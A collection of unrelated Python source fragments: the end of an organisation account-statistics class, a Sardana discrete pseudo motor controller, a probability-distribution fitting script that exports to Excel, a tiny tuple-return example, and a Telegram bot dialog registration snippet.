result = stats["total"] - stats["disabled"]
else:
result = 0
return result
# -------------------------------------------------------------------------
def disabled_accounts(self, row):
"""
Field method to return the number of disabled user accounts
for the organisation
Args:
row: the Row
"""
if hasattr(row, "org_organisation"):
row = row.org_organisation
stats = self.stats.get(row.id)
return stats["disabled"] if stats else 0
# -------------------------------------------------------------------------
def active30(self, row):
"""
Field method to return the number of user accounts for the
organisation which have been used over the past 30 days
(useful to verify the number of active accounts)
Args:
row: the Row
"""
if hasattr(row, "org_organisation"):
row = row.org_organisation
stats = self.stats.get(row.id)
return stats["active30"] if stats else 0
# END =========================================================================
|
#!/usr/bin/env python
##############################################################################
##
# This file is part of Sardana
##
# http://www.sardana-controls.org/
##
# Copyright 2011 CELLS / ALBA Synchrotron, Bellaterra, Spain
##
# Sardana is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
##
# Sardana is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
##
# You should have received a copy of the GNU Lesser General Public License
# along with Sardana. If not, see <http://www.gnu.org/licenses/>.
##
##############################################################################
"""This module contains the definition of a discrete pseudo motor controller
for the Sardana Device Pool"""
__all__ = ["DiscretePseudoMotorController"]
__docformat__ = 'restructuredtext'
import json
from sardana import DataAccess
from sardana.pool.controller import PseudoMotorController
from sardana.pool.controller import Type, Access, Description
class DiscretePseudoMotorController(PseudoMotorController):
"""
A discrete pseudo motor controller which converts physical motor
positions to discrete values"""
gender = "DiscretePseudoMotorController"
model = "PseudoMotor"
organization = "Sardana team"
image = ""
pseudo_motor_roles = ("DiscreteMoveable",)
motor_roles = ("ContinuousMoveable",)
axis_attributes = {'Configuration':
# type hackish until encoded attributes supported
{Type: str,
Description: 'String dictionary mapping the labels'
' and discrete positions',
Access: DataAccess.ReadWrite}
}
def __init__(self, inst, props, *args, **kwargs):
PseudoMotorController.__init__(self, inst, props, *args, **kwargs)
self._calibration = []
self._positions = []
self._labels = []
self._configuration = None
self._calibration_cfg = None
self._positions_cfg = None
self._labels_cfg = None
def GetAxisAttributes(self, axis):
axis_attrs = PseudoMotorController.GetAxisAttributes(self, axis)
axis_attrs = dict(axis_attrs)
axis_attrs['Position']['type'] = float
return axis_attrs
def CalcPseudo(self, axis, physical_pos, curr_pseudo_pos):
positions = self._positions_cfg
calibration = self._calibration_cfg
labels = self._labels_cfg
llabels = len(labels)
lcalibration = len(calibration)
value = physical_pos[0]
# case 0: nothing to translate, only round about integer the attribute
# value
if llabels == 0:
return int(value)
# case 1: only uses the labels. Available positions in POSITIONS
elif lcalibration == 0:
value = int(value)
try:
positions.index(value)
except Exception:
raise Exception("Invalid position.")
else:
return value
# case 1+fussy: the physical position must be in one of the defined
# ranges, and the DiscretePseudoMotor position is defined in labels
elif llabels == lcalibration:
for fussyPos in calibration:
if value >= fussyPos[0] and value <= fussyPos[2]:
return positions[calibration.index(fussyPos)]
# if the loop ends, current value is not in the fussy areas.
raise Exception("Invalid position.")
else:
raise Exception("Bad configuration on axis attributes.")
def CalcPhysical(self, axis, pseudo_pos, curr_physical_pos):
positions = self._positions_cfg
calibration = self._calibration_cfg
labels = self._labels_cfg
# If Labels is well defined, the write value must be one this struct
llabels = len(labels)
lcalibration = len(calibration)
value = pseudo_pos[0]
# case 0: nothing to translate, what is written goes to the attribute
if llabels == 0:
return value
# case 1: only uses the labels. Available positions in POSITIONS
elif lcalibration == 0:
self._log.debug("Value = %s", value)
try:
positions.index(value)
except Exception:
raise Exception("Invalid position.")
return value
        # case 1+fussy: the write to the DiscretePseudoMotorController
# is translated to the central position of the calibration.
elif llabels == lcalibration:
self._log.debug("Value = %s", value)
try:
destination = positions.index(value)
except Exception:
raise Exception("Invalid position.")
self._log.debug("destination = %s", destination)
calibrated_position = calibration[
destination][1] # central element
self._log.debug("calibrated_position = %s", calibrated_position)
return calibrated_position
def getConfiguration(self, axis):
return json.dumps(self._configuration)
def setConfiguration(self, axis, value):
try:
mapping = json.loads(value)
labels = []
positions = []
calibration = []
for k, v in list(mapping.items()):
labels.append(k)
pos = int(v['pos'])
if pos in positions:
msg = 'position {0} is already used'.format(pos)
raise ValueError(msg)
positions.append(pos)
if all([x in list(v.keys()) for x in ['min', 'set', 'max']]):
calibration.append([v['min'], v['set'], v['max']])
self._labels_cfg = labels
self._positions_cfg = positions
self._calibration_cfg = calibration
self._configuration = json.loads(value)
except Exception as e:
msg = "invalid configuration: {0}".format(e)
raise Exception(msg)
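    # Illustrative Configuration value (an assumption based on setConfiguration above):
    # a JSON string mapping each label to its discrete position and, optionally, a
    # min/set/max calibration window, e.g.
    #   '{"OUT": {"pos": 0, "min": -5.0, "set": 0.0, "max": 5.0},
    #     "IN":  {"pos": 1, "min": 45.0, "set": 50.0, "max": 55.0}}'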
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 24 19:11:35 2020
@author: garci
"""
'''
A PROBABILITY DENSITY FUNCTION (PDF) FITTING PROGRAM
pdsfit_more.py - fit multiple datasets to probability distributions and tabulate all statistical data thereof to Excel
Andrew Garcia, 2020
'''
from scipy import stats
import numpy as np
import matplotlib.pylab as plt
# import xlwings as xw
import pandas as pd
#frame_pdsfit has make and LastRow
from frame_pdsfit import *
''' ARGS LIBRARY (line 27) '''
# import the necessary packages
import argparse
# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
'----------------------------------------------------------------------------------------'
'SPECIFY PATH AND FILE NAME HERE'
ap.add_argument("-p", "--path",
default= '/home/andrew/scripts/statistics/templates-examples/pdsfit/dataset',
help="global path to folder containing folders with datasets")
ap.add_argument("-fn", "--xlfilename", default='Results.xls',
help="To simplify iteration of several fits, all Excel files from \
different experiments (different folders) should have the same name\
(default file name: Results.xls)")
'----------------------------------------------------------------------------------------'
ap.add_argument("-s", "--sheet", default='Results',
help="name of sheet containing dataset (default: Results)")
ap.add_argument("-n", "--column_name", default='value',
help="column name to get histogram info ")
ap.add_argument("-d", "--distribution", default=['gauss','lognorm','expon','gamma','beta'],
nargs = '+', type =str,
help="distribution fitting models *type each separated by a space\
i.e. -d gauss lognorm ... (default: all)")
ap.add_argument("-plt", "--plots", default='y',
help="make plots for all data being fitted (default: y[yes])")
ap.add_argument("-b", "--bins", type=int, default=8,
help="# of bins to display for histogram (default: 8)")
ap.add_argument("-r", "--xrange", default=None,nargs = '+',
help="range of x-axis expressed as: -r low high [e.g. -r 0 400] (default: None)")
ap.add_argument("-c", "--colorbins", default='dodgerblue',
help="color of bins (default: 'dodgerblue')")
ap.add_argument("-xl", "--toExcel", default='y',
help="tabulate results of all statistical fits to excel file\\ python pandas module\
(default: y[yes])")
args = vars(ap.parse_args())
import os
folders = os.listdir(args["path"])
print(folders)
def mult(toexcel=args["toExcel"]):
Gval = []
folder_names = os.listdir(args["path"])
for name in folder_names:
# book=xw.Book(args["path"]+r'/'+ name + r'/' + args["xlfilename"])
book = pd.read_excel(args["path"]+r'/'+ name + r'/' + args["xlfilename"])
# idx = args["sheet"]
# column_data = book.sheets[idx].range( args["column"] + ':' + args["column"][0]+str(lastRow(idx,book)) ).value
# plt.style.use("ggplot")
f = make_wplt if args["plots"] == 'y' else make
lbl,val = f(book[args["column_name"]], name,args["distribution"],bins=args["bins"],\
xlims=[float(args["xrange"][0]),float(args["xrange"][1])] \
if args["xrange"] is not None else '', colorbins=args["colorbins"])
# lbl,val = f(column_data, name,args["distribution"],bins=args["bins"],\
# xlims=[float(args["xrange"][0]),float(args["xrange"][1])] \
# if args["xrange"] is not None else '', colorbins=args["colorbins"])
# book.close()
Gval.append(val)
df = pd.DataFrame(Gval, columns=lbl)
df.insert(0,'Experiment Name',folder_names)
print(df)
if toexcel == 'y':
'write to excel'
# wb = xw.Book()
# sht = wb.sheets['Sheet1']
# sht.range('A1').value = df
# sht.range('A1').options(pd.DataFrame, expand='table').value
df.to_excel('/home/andrew/scripts/statistics/pdsfitmore_info.xlsx', index = False)
mult()
|
def get_person():
name="leonardo"
age=35
country="uk"
return name,age,country
name,age,country = get_person()
print(name)
print(age)
print(country)
|
from aiogram.types import ContentTypes, Message
from dialog.avatar_picture_dialog import AvatarDialog
from dialog.main_menu import MainMenuDialog
from lib.depcont import DepContainer
async def sticker_handler(message: Message):
s = message.sticker
await message.reply(f'Sticker: {s.emoji}: {s.file_id}')
def init_dialogs(d: DepContainer):
MainMenuDialog.register(d)
mm = MainMenuDialog
AvatarDialog.register(d, mm, mm.entry_point)
d.dp.register_message_handler(sticker_handler, content_types=ContentTypes.STICKER, state='*')
|